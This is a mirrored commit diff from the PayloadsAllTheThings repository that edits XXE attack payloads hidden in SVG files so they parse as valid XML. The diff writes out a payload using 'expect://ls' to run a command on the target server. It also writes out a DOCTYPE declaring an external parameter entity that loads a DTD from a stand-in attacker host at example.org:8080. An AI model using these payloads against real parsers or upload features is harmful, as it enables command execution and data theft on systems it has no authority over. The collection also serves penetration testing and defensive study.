mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
improved XXE SVG payloads to be valid XMLs
This commit is contained in:
parent
08b59f2856
commit
43a9a5d235
@ -419,7 +419,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
|
|||||||
|
|
||||||
```xml
|
```xml
|
||||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
|
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
|
||||||
<image xlink:href="expect://ls"></image>
|
<image xlink:href="expect://ls" width="200" height="200"></image>
|
||||||
</svg>
|
</svg>
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -438,6 +438,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
|
|||||||
*xxe.svg*
|
*xxe.svg*
|
||||||
|
|
||||||
```xml
|
```xml
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
<!DOCTYPE svg [
|
<!DOCTYPE svg [
|
||||||
<!ELEMENT svg ANY >
|
<!ELEMENT svg ANY >
|
||||||
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
|
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
|
||||||
|
Loading…
Reference in New Issue
Block a user